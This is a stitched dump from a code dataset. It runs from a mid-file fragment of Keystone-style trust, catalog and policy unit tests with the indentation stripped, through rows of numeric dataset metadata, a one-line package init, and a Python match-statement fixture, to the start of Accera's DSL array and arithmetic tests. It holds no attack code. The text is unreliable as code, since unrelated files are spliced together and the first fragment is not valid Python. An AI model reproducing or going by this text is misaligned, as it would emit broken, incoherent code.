self.assertIsNotNone(trust_data)
trust_data = self.trust_api.get_trust(trust_id)
self.assertEquals(new_id, trust_data['id'])
self.trust_api.delete_trust(trust_id)
self.assertIsNone(self.trust_api.get_trust(trust_id))
def test_get_trust(self):
new_id = uuid.uuid4().hex
trust_data = self.create_sample_trust(new_id)
trust_id = trust_data['id']
self.assertIsNotNone(trust_data)
trust_data = self.trust_api.get_trust(trust_id)
self.assertEquals(new_id, trust_data['id'])
def test_create_trust(self):
new_id = uuid.uuid4().hex
trust_data = self.create_sample_trust(new_id)
self.assertEquals(new_id, trust_data['id'])
self.assertEquals(self.trustee['id'], trust_data['trustee_user_id'])
self.assertEquals(self.trustor['id'], trust_data['trustor_user_id'])
self.assertTrue(timeutils.normalize_time(trust_data['expires_at']) >
timeutils.utcnow())
self.assertEquals([{'id':'member'},
{'id': 'other'},
{'id': 'browser'}], trust_data['roles'])
def test_list_trust_by_trustee(self):
for i in range(0, 3):
trust_data = self.create_sample_trust(uuid.uuid4().hex)
trusts = self.trust_api.list_trusts_for_trustee(self.trustee)
self.assertEqual(len(trusts), 3)
self.assertEqual(trusts[0]["trustee_user_id"], self.trustee['id'])
trusts = self.trust_api.list_trusts_for_trustee(self.trustor)
self.assertEqual(len(trusts), 0)
def test_list_trust_by_trustee(self):
for i in range(0, 3):
trust_data = self.create_sample_trust(uuid.uuid4().hex)
trusts = self.trust_api.list_trusts_for_trustor(self.trustor['id'])
self.assertEqual(len(trusts), 3)
self.assertEqual(trusts[0]["trustor_user_id"], self.trustor['id'])
trusts = self.trust_api.list_trusts_for_trustor(self.trustee['id'])
self.assertEqual(len(trusts), 0)
def test_list_trusts(self):
for i in range(0, 3):
trust_data = self.create_sample_trust(uuid.uuid4().hex)
trusts = self.trust_api.list_trusts()
self.assertEqual(len(trusts), 3)
class CommonHelperTests(test.TestCase):
def test_format_helper_raises_malformed_on_missing_key(self):
with self.assertRaises(exception.MalformedEndpoint):
core.format_url("http://%(foo)s/%(bar)s", {"foo": "1"})
def test_format_helper_raises_malformed_on_wrong_type(self):
with self.assertRaises(exception.MalformedEndpoint):
core.format_url("http://%foo%s", {"foo": "1"})
def test_format_helper_raises_malformed_on_incomplete_format(self):
with self.assertRaises(exception.MalformedEndpoint):
core.format_url("http://%(foo)", {"foo": "1"})
class CatalogTests(object):
def test_service_crud(self):
# create
service_id = uuid.uuid4().hex
new_service = {
'id': service_id,
'type': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
}
res = self.catalog_api.create_service(
service_id,
new_service.copy())
self.assertDictEqual(res, new_service)
# list
services = self.catalog_api.list_services()
self.assertIn(service_id, [x['id'] for x in services])
# delete
self.catalog_api.delete_service(service_id)
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.delete_service, {}, service_id)
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.get_service, {}, service_id)
def test_delete_service_with_endpoint(self):
# create a service
service = {
'id': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
}
self.catalog_api.create_service(service['id'], service)
# create an endpoint attached to the service
endpoint = {
'id': uuid.uuid4().hex,
'region': uuid.uuid4().hex,
'interface': uuid.uuid4().hex[:8],
'url': uuid.uuid4().hex,
'service_id': service['id'],
}
self.catalog_api.create_endpoint(endpoint['id'], endpoint)
# deleting the service should also delete the endpoint
self.catalog_api.delete_service(service['id'])
self.assertRaises(exception.EndpointNotFound,
self.catalog_man.get_endpoint, {}, endpoint['id'])
self.assertRaises(exception.EndpointNotFound,
self.catalog_man.delete_endpoint, {}, endpoint['id'])
def test_get_service_404(self):
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.get_service,
{},
uuid.uuid4().hex)
def test_delete_service_404(self):
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.delete_service,
{},
uuid.uuid4().hex)
def test_create_endpoint_404(self):
endpoint = {
'id': uuid.uuid4().hex,
'service_id': uuid.uuid4().hex,
}
self.assertRaises(exception.ServiceNotFound,
self.catalog_man.create_endpoint,
{},
endpoint['id'],
endpoint)
def test_get_endpoint_404(self):
self.assertRaises(exception.EndpointNotFound,
self.catalog_man.get_endpoint,
{},
uuid.uuid4().hex)
def test_delete_endpoint_404(self):
self.assertRaises(exception.EndpointNotFound,
self.catalog_man.delete_endpoint,
{},
uuid.uuid4().hex)
def test_create_endpoint(self):
service = {
'id': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
}
self.catalog_api.create_service(service['id'], service.copy())
endpoint = {
'id': uuid.uuid4().hex,
'region': "0" * 255,
'service_id': service['id'],
'interface': 'public',
'url': uuid.uuid4().hex,
}
self.catalog_api.create_endpoint(endpoint['id'], endpoint.copy())
class PolicyTests(object):
def _new_policy_ref(self):
return {
'id': uuid.uuid4().hex,
'policy': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
'endpoint_id': uuid.uuid4().hex,
}
def assertEqualPolicies(self, a, b):
self.assertEqual(a['id'], b['id'])
self.assertEqual(a['endpoint_id'], b['endpoint_id'])
self.assertEqual(a['policy'], b['policy'])
self.assertEqual(a['type'], b['type'])
def test_create(self):
ref = self._new_policy_ref()
res = self.policy_api.create_policy(ref['id'], ref)
self.assertEqualPolicies(ref, res)
def test_get(self):
ref = self._new_policy_ref()
res = self.policy_api.create_policy(ref['id'], ref)
res = self.policy_api.get_policy(ref['id'])
self.assertEqualPolicies(ref, res)
def test_list(self):
ref = self._new_policy_ref()
self.policy_api.create_policy(ref['id'], ref)
res = self.policy_api.list_policies()
res = [x for x in res if x['id'] == ref['id']][0]
self.assertEqualPolicies(ref, res)
def test_update(self):
ref = self._new_policy_ref()
self.policy_api.create_policy(ref['id'], ref)
orig = ref
ref = self._new_policy_ref()
# (cannot change policy ID)
self.assertRaises(exception.ValidationError,
self.policy_man.update_policy,
{},
orig['id'],
ref)
ref['id'] = orig['id']
res = self.policy_api.update_policy(orig['id'], ref)
self.assertEqualPolicies(ref, res)
def test_delete(self):
ref = self._new_policy_ref()
self.policy_api.create_policy(ref['id'], ref)
self.policy_api.delete_policy(ref['id'])
self.assertRaises(exception.PolicyNotFound,
self.policy_man.delete_policy, {}, ref['id'])
self.assertRaises(exception.PolicyNotFound,
self.policy_man.get_policy, {}, ref['id'])
res = self.policy_api.list_policies()
self.assertFalse(len([x for x in res if x['id'] == ref['id']]))
def test_get_policy_404(self):
self.assertRaises(exception.PolicyNotFound,
self.policy_man.get_policy,
{},
uuid.uuid4().hex)
def test_update_policy_404(self):
self.assertRaises(exception.PolicyNotFound,
self.policy_man.update_policy,
{},
uuid.uuid4().hex,
{})
def test_delete_policy_404(self):
self.assertRaises(exception.PolicyNotFound,
self.policy_man.delete_policy,
{},
uuid.uuid4().hex)
| 46.385714 | 79 | 0.559285 | 12,622 | 110,398 | 4.612423 | 0.031136 | 0.093992 | 0.07709 | 0.044007 | 0.883833 | 0.853654 | 0.82021 | 0.792762 | 0.754543 | 0.718558 | 0 | 0.017345 | 0.313276 | 110,398 | 2,379 | 80 | 46.405212 | 0.75057 | 0.028868 | 0 | 0.699416 | 0 | 0 | 0.056937 | 0.000196 | 0 | 0 | 0 | 0.000841 | 0.156128 | 1 | 0.076362 | false | 0.02821 | 0.004377 | 0.000486 | 0.085603 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
228a4a5fe5c49ac9f8b18fd284282c07016ae67a | 27 | py | Python | relart/cross_validation/__init__.py | artemmoskalev/relart | 8c1d063bdcfd2bdb5558df3de770014db4c2b130 | [
"MIT"
] | null | null | null | relart/cross_validation/__init__.py | artemmoskalev/relart | 8c1d063bdcfd2bdb5558df3de770014db4c2b130 | [
"MIT"
] | null | null | null | relart/cross_validation/__init__.py | artemmoskalev/relart | 8c1d063bdcfd2bdb5558df3de770014db4c2b130 | [
"MIT"
] | null | null | null | from .grid_search import *
| 13.5 | 26 | 0.777778 | 4 | 27 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
22af4591d6c294f51d1b6669523502f70637a695 | 233 | py | Python | python/testData/psi/PatternMatchingMappingPatterns.py | 06needhamt/intellij-community | 63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b | [
"Apache-2.0"
] | null | null | null | python/testData/psi/PatternMatchingMappingPatterns.py | 06needhamt/intellij-community | 63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b | [
"Apache-2.0"
] | null | null | null | python/testData/psi/PatternMatchingMappingPatterns.py | 06needhamt/intellij-community | 63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b | [
"Apache-2.0"
] | null | null | null | match x:
case {}:
pass
case {"foo": 1}:
pass
case {"foo": 1,}:
pass
case {"foo": {"bar": []}}:
pass
case {"foo": 1, "bar": 2}:
pass
case {"foo": 1, **args}:
pass | 17.923077 | 30 | 0.360515 | 27 | 233 | 3.111111 | 0.333333 | 0.47619 | 0.654762 | 0.571429 | 0.416667 | 0.416667 | 0.416667 | 0 | 0 | 0 | 0 | 0.037594 | 0.429185 | 233 | 13 | 31 | 17.923077 | 0.593985 | 0 | 0 | 0.461538 | 0 | 0 | 0.089744 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.461538 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
22b27d03fe5a62ee97949f41248326416077dff9 | 121,582 | py | Python | accera/python/accera/test/dsl_tests.py | Arslan-e-Mustafa/Accera | d5e39f3eac6cee86e1f6ad8e14bf5b776062569f | [
"MIT"
] | null | null | null | accera/python/accera/test/dsl_tests.py | Arslan-e-Mustafa/Accera | d5e39f3eac6cee86e1f6ad8e14bf5b776062569f | [
"MIT"
] | null | null | null | accera/python/accera/test/dsl_tests.py | Arslan-e-Mustafa/Accera | d5e39f3eac6cee86e1f6ad8e14bf5b776062569f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
####################################################################################################
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root for license information.
####################################################################################################
# Tip: to run a particular test / set of tests:
# python -m unittest discover -k "test_input_array" path_to_accera/test dsl_tests.py
# python -m unittest discover -k "DSLTest_01" path_to_accera/test dsl_tests.py
import logging
import sys
import unittest
import os
import pathlib
import numpy as np
from enum import Enum
from typing import Callable, Tuple
DEV_MODE = False
if "@CMAKE_INSTALL_PREFIX@"[1:-1] != "CMAKE_INSTALL_PREFIX":
sys.path.insert(1, "@CMAKE_INSTALL_PREFIX@")
else:
DEV_MODE = True
sys.path.insert(1, os.getcwd())
from accera import ScalarType, Array, Function, Nest, Target, Package
from accera.test import verifiers
TEST_MODE = Package.Mode.DEBUG if DEV_MODE else Package.Mode.RELEASE
TEST_FORMAT = Package.Format.MLIR_DYNAMIC if DEV_MODE else Package.Format.HAT_DYNAMIC
TEST_PACKAGE_DIR = "test_acccgen"
# Groups of types commonly used for tests
INT_TYPES = [
ScalarType.int8, ScalarType.int16, ScalarType.int32, ScalarType.int64, ScalarType.uint8, ScalarType.uint16,
ScalarType.uint32, ScalarType.uint64
]
FLOAT_TYPES = [ScalarType.float16, ScalarType.float32, ScalarType.float64]
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
os.environ["OMP_DISPLAY_AFFINITY"] = "TRUE"
# TODO: Remove all @expectedFailure decorators as implementation converges with spec
class FailedReason(Enum):
NOT_IN_CORE = "Not yet implemented (core)"
NOT_IN_PY = "Not yet implemented (python)"
UNKNOWN = "Unknown failure"
BUG = "Bug"
def expectedFailure(reason: FailedReason, msg: str, condition: bool = True) -> Callable:
"Extends the unittest.expectedFailure decorator to print failure details and takes an optional condition"
def _decorator(func):
@unittest.expectedFailure
def _wrapper(x):
print(f"\n{reason.value}: {msg}")
try:
return func(x)
except Exception as e:
print(f"\t{e}\n")
raise (e)
return _wrapper if condition else func
return _decorator
class DSLTest_01Arrays(unittest.TestCase):
def _verify_nest(self, nest, args: Tuple[Array], package_name, correctness_check_values=None) -> None:
# create a HAT package and add the function to it
package = Package()
function = package.add(nest, args, base_name=package_name)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_input_array(self) -> None:
A = Array(shape=(10, 20), role=Array.Role.INPUT, element_type=ScalarType.float32)
self.assertIsNotNone(A)
def test_input_array_standard_layout(self) -> None:
A = Array(shape=(10, 20), role=Array.Role.INPUT, layout=Array.Layout.LAST_MAJOR)
# A = Array(shape=(10, 20), layout=Array.Layout.LAST_MAJOR, role=Array.Role.INPUT, element_type=ScalarType.float32)
self.assertIsNotNone(A)
def test_input_array_dimension_layout(self) -> None:
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20), layout=(1, 10))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20), layout=(10, 1))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, ), layout=(1, ))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20, 50), layout=(1, 10, 200))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20, 50), layout=(200, 10, 1))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20, 50), layout=(1, 200, 10))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20, 50), layout=(10, 200, 1))
self.assertIsNotNone(A)
def test_input_array_infinite_major_dimension(self) -> None:
from accera import inf
with self.assertRaises(ValueError):
Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(inf, inf))
A = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(10, inf))
self.assertIsNotNone(A)
self.assertEqual(A.shape[1], inf)
nest = Nest(shape=(10, 16))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] += A[i, j]
package = Package()
package.add(nest, (A, ), base_name="inf_test")
self.assertEqual(A.shape[1], 16)
package_name = "input_array_inf_test"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_input_output_array(self) -> None:
A = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(10, 20))
self.assertIsNotNone(A)
def test_const_array(self) -> None:
for dt in [
bool, # np.bool is deprecated in favor of bool
np.int8,
np.int16,
np.int32,
np.int64,
np.uint8,
np.uint16,
np.uint32,
np.uint64,
np.float16,
np.float32,
np.float64
]:
D = np.ones((128, 256), dtype=dt)
A = Array(role=Array.Role.CONST, data=D)
self.assertIsNotNone(A)
def test_const_array_type_layout(self) -> None:
D = np.ones((128, 256), dtype=np.float64)
for t in [ScalarType.bool] + INT_TYPES + FLOAT_TYPES:
A = Array(role=Array.Role.CONST, element_type=t, layout=Array.Layout.LAST_MAJOR, data=D)
self.assertIsNotNone(A)
def test_temp_array(self) -> None:
A = Array(role=Array.Role.TEMP, element_type=ScalarType.float32, layout=Array.Layout.LAST_MAJOR, shape=(10, 20))
self.assertIsNotNone(A)
B = Array(
role=Array.Role.TEMP, element_type=ScalarType.float32, layout=Array.Layout.FIRST_MAJOR, shape=(10, 20)
)
self.assertIsNotNone(B)
def test_temp_array_materialization_1(self) -> None:
# Materializes (allocates) a TEMP array externally to an added function
def make_test_fn(package, A, B, C):
T = Array(role=Array.Role.TEMP, element_type=A.element_type, shape=A.shape)
nest = Nest(A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
T[i, j] = A[i, j] + B[i, j]
C[i, j] += T[i, j]**2.
return package.add(nest, args=(A, B, C))
A = Array(shape=(256, 32), role=Array.Role.INPUT)
B = Array(shape=(256, 32), role=Array.Role.INPUT)
C = Array(shape=(256, 32), role=Array.Role.INPUT_OUTPUT)
package = Package()
make_test_fn(package, A, B, C)
package_name = "test_temp_array_materialization_1"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_temp_array_materialization_2(self) -> None:
# Materializes (allocates) a TEMP array within an added function
package = Package()
A = Array(shape=(256, 32), role=Array.Role.INPUT)
B = Array(shape=(256, 32), role=Array.Role.INPUT_OUTPUT)
def make_init_function(package, A):
nest = Nest(A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] = 3.14
return package.add(nest, args=(A, ))
init_fn = make_init_function(package, B)
def make_helper_function2(package, A, B):
nest = Nest(A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
B[i, j] += A[i, j] * 2.
return package.add(nest, args=(A, B))
helper_fn2 = make_helper_function2(package, A, B)
def test_fn(A, B):
T = Array(role=Array.Role.TEMP, element_type=A.element_type, shape=A.shape)
init_fn(T)
helper_fn2(T, B)
helper_fn2(A, B)
package.add(test_fn, args=(A, B))
package_name = "test_temp_array_materialization_2"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fn_wrong_role(A, B):
T = Array(role=Array.Role.INPUT_OUTPUT, element_type=A.element_type, shape=A.shape)
init_fn(T)
helper_fn2(T, B)
helper_fn2(A, B)
package.add(test_fn_wrong_role, args=(A, B))
package_name = "test_temp_array_materialization_2_wrong_role"
with self.assertRaises(ValueError):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_temp_array_materialization_3(self) -> None:
# Materializes (allocates) a TEMP array within some nest iteration logic
# *without* passing the array as a function argument
package = Package()
A = Array(shape=(256, 32), role=Array.Role.INPUT_OUTPUT)
B = Array(shape=(256, 32), role=Array.Role.INPUT_OUTPUT)
nest = Nest(A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
T = Array(role=Array.Role.TEMP, element_type=A.element_type, shape=(1, ))
# TODO: inject via introspection if we need to support this scenario
T._allocate()
T = T._get_native_array()
T[0] = B[i, j]
B[i, j] += A[i, j] * 2.
A[i, j] = T[0]
package.add(nest, args=(A, B))
package_name = "test_temp_array_materialization_3"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_first_major_array_access(self) -> None:
A = Array(shape=(256, 32), role=Array.Role.INPUT, layout=Array.Layout.FIRST_MAJOR)
nest = Nest(shape=(256, 32))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] = 5.0
A_test = np.random.random((256, 32)).astype(np.float32)
A_expected = np.ndarray((256, 32)).astype(np.float32)
A_expected.fill(5.0)
correctness_check_values = {
"pre": (A_test, ),
"post": (A_expected, )
}
self._verify_nest(
nest, (A, ), "test_first_major_array_access", correctness_check_values=correctness_check_values
)
def test_last_major_array_access(self) -> None:
A = Array(shape=(256, 32), role=Array.Role.INPUT, layout=Array.Layout.LAST_MAJOR)
nest = Nest(shape=(256, 32))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] = 5.0
A_test = np.random.random((256, 32)).astype(np.float32, order="F")
A_expected = np.ndarray((256, 32)).astype(np.float32, order="F")
A_expected.fill(5.0)
correctness_check_values = {
"pre": (A_test, ),
"post": (A_expected, )
}
self._verify_nest(
nest, (A, ), "test_last_major_array_access", correctness_check_values=correctness_check_values
)
def test_array_value_type_cast(self) -> None:
A = Array(shape=(256, 32), role=Array.Role.INPUT, layout=Array.Layout.FIRST_MAJOR)
B = Array(
shape=(256, 32), role=Array.Role.INPUT, layout=Array.Layout.FIRST_MAJOR, element_type=ScalarType.int32
)
nest = Nest(shape=(256, 32))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] = 5 # implicit cast from int8 to float
B[i, j] = 10 # implicit cast from int8 to int32
A_test = np.random.random((256, 32)).astype(np.float32)
A_expected = np.ndarray((256, 32)).astype(np.float32)
A_expected.fill(5.0)
B_test = np.random.random((256, 32)).astype(np.int32)
B_expected = np.ndarray((256, 32)).astype(np.int32)
B_expected.fill(10)
correctness_check_values = {
"pre": (A_test, B_test),
"post": (A_expected, B_expected)
}
self._verify_nest(nest, (A, B), "test_array_value_type_cast", correctness_check_values=correctness_check_values)
def test_subarray(self) -> None:
package = Package()
arr = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(256, 256))
arr0 = arr.sub_array(offsets=(0, 0), shape=(128, 128))
self.assertEqual(arr0.shape, [128, 128])
self.assertEqual(arr0.element_type, arr.element_type)
print(arr0.layout)
# add a function that utilizes a subarray layout
def make_subarray_fn(arr0):
nest = Nest(shape=arr0.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
arr0[i, j] += 1.
return package.add(nest, args=(arr0, ))
subarray_fn = make_subarray_fn(arr0)
# add a function that instantiates a subarray of the input array and calls the function above
def main(arr):
arr1 = arr.sub_array(offsets=(0, 0), shape=(128, 128))
print(arr1.layout)
self.assertEqual(arr0.layout, arr1.layout)
subarray_fn(arr1)
package.add(main, args=(arr, ))
package_name = "test_subarray"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_subarray_l2(self) -> None:
package = Package()
arr = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(256, 256))
arr0 = arr.sub_array(offsets=(0, 0), shape=(128, 128))
self.assertEqual(arr0.shape, [128, 128])
self.assertEqual(arr0.element_type, arr.element_type)
arr00 = arr0.sub_array(offsets=(64, 64), shape=(64, 64))
self.assertEqual(arr00.shape, [64, 64])
self.assertEqual(arr00.element_type, arr0.element_type)
# add a function that utilizes a subarray layout
def make_fn(A):
nest = Nest(shape=A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] += 1.
return package.add(nest, args=(A, ))
subarray_fn = make_fn(arr0)
subarray_fn1 = make_fn(arr00)
# add a function that instantiates a subarray of the input array and calls the function above
def main(arr):
arr1 = arr.sub_array(offsets=(0, 0), shape=(128, 128))
arr11 = arr1.sub_array(offsets=(64, 64), shape=(64, 64))
print(f"{arr1.layout}\n{arr11.layout}")
self.assertEqual(arr0.layout, arr1.layout)
self.assertEqual(arr00.layout, arr11.layout)
subarray_fn(arr1)
subarray_fn1(arr11)
package.add(main, args=(arr, ))
package_name = "test_subarray_l2"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
class DSLTest_02SimpleAffineLoopNests(unittest.TestCase):
def _create_nest(self, shape: Tuple[int], type=ScalarType.float32) -> Tuple:
# helper function to create a nest so that we can focus on the logic function
M, N, S = shape
A = Array(role=Array.Role.INPUT, element_type=type, shape=(M, S))
B = Array(role=Array.Role.INPUT, element_type=type, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=type, shape=(M, N))
return Nest(shape=(M, N, S)), A, B, C
def _build_nest(self, nest, args: Tuple[Array], package_name, correctness_check_values=None) -> None:
# helper function to build a nest so that we can focus on the logic function
# create a HAT package and add the nest to it
package = Package()
function = package.add(nest, args, base_name=package_name)
# build the HAT package
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_signed_types(self) -> None:
for t in [ScalarType.int16, ScalarType.int32, ScalarType.int64] + FLOAT_TYPES:
A = Array(role=Array.Role.INPUT, element_type=t, shape=(16, 16))
B = Array(role=Array.Role.INPUT, element_type=t, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=t, shape=(16, 16))
nest = Nest(shape=(16, 16))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, j] + B[i, j]
C[i, j] += A[i, j] - B[i, j]
C[i, j] += A[i, j] * B[i, j]
C[i, j] += A[i, j] / B[i, j]
dtype = np.dtype(t.name)
A_test = np.random.random(A.shape).astype(dtype)
B_test = np.ones((C.shape)).astype(dtype) # avoid divide by zero
C_test = np.random.random(C.shape).astype(dtype)
C_ref = C_test + A_test + B_test
C_ref = C_ref + A_test - B_test
C_ref = C_ref + A_test * B_test
C_ref = C_ref + A_test / B_test
if t == ScalarType.float16: # TODO: verification issue with correctness check?
correctness_check_values = None
else:
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._build_nest(nest, [A, B, C], f"test_types_{t.name}", correctness_check_values)
def test_unsigned_types(self) -> None:
for t in [ScalarType.uint8, ScalarType.uint16, ScalarType.uint32, ScalarType.uint64]:
A = Array(role=Array.Role.INPUT, element_type=t, shape=(16, 16))
B = Array(role=Array.Role.INPUT, element_type=t, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=t, shape=(16, 16))
nest = Nest(shape=(16, 16))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, j] + B[i, j]
C[i, j] += A[i, j] - B[i, j]
C[i, j] += A[i, j] * B[i, j]
C[i, j] += A[i, j] / B[i, j]
dtype = np.dtype(t.name)
A_test = np.random.random(A.shape).astype(dtype)
B_test = np.ones((C.shape)).astype(dtype) # avoid divide by zero
C_test = np.random.random(C.shape).astype(dtype)
C_ref = C_test + A_test + B_test
C_ref = C_ref + A_test - B_test
C_ref = C_ref + A_test * B_test
C_ref = C_ref + A_test / B_test
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._build_nest(nest, [A, B, C], f"test_types_{t.name}", correctness_check_values)
def test_arithmetic_operations(self) -> None:
for t in INT_TYPES + FLOAT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] = A[i, k] + B[k, j] # test assignment
C[i, j] += A[i, k] - B[k, j]
C[i, j] += A[i, k] * B[k, j]
C[i, j] += A[i, k] / B[k, j]
C[i, j] += -A[i, k]
C[i, j] += A[i, k] // B[k, j]
C[i, j] += A[i, k] % B[k, j]
C[i, j] += A[i, k]**B[k, j]
self._build_nest(nest, [A, B, C], f"test_arithmetic_operations_{t.name}")
def test_relational_operations(self) -> None:
from accera._lang_python._lang import _If
for t in [ScalarType.bool] + INT_TYPES + FLOAT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
def f1():
C[i, j] += A[i, k] + B[k, j]
def f2():
C[i, j] -= A[i, k] + B[k, j]
def f3():
C[i, j] *= A[i, k] + B[k, j]
def f4():
C[i, j] /= A[i, k] + B[k, j]
# BUGBUG: this syntax probably needs to change
_If(A[i, k] == B[k, j], f1)
_If(A[i, k] != B[k, j], f2)
_If(A[i, k] < B[k, j], f3)
_If(A[i, k] <= B[k, j], f4)
_If(A[i, k] > B[k, j], f1)
_If(A[i, k] >= B[k, j], f2)
self._build_nest(nest, [A, B, C], f"test_relational_operations_{t.name}")
def test_logical_operations(self) -> None:
from accera import logical_and, logical_or, logical_not
for t in [ScalarType.bool] + INT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += logical_not(A[i, k])
C[i, j] += logical_and(A[i, k], B[k, j])
C[i, j] += logical_or(A[i, k], B[k, j])
self._build_nest(nest, [A, B, C], f"test_logical_operations_{t.name}")
def test_bitwise_operations(self) -> None:
for t in INT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += B[j, k] >> 1
C[i, j] += A[i, j] << 2
C[i, j] += A[i, j] & B[j, k]
C[i, j] += A[i, j] | B[j, k]
C[i, j] += A[i, j] ^ B[j, k]
C[i, j] += ~A[i, j]
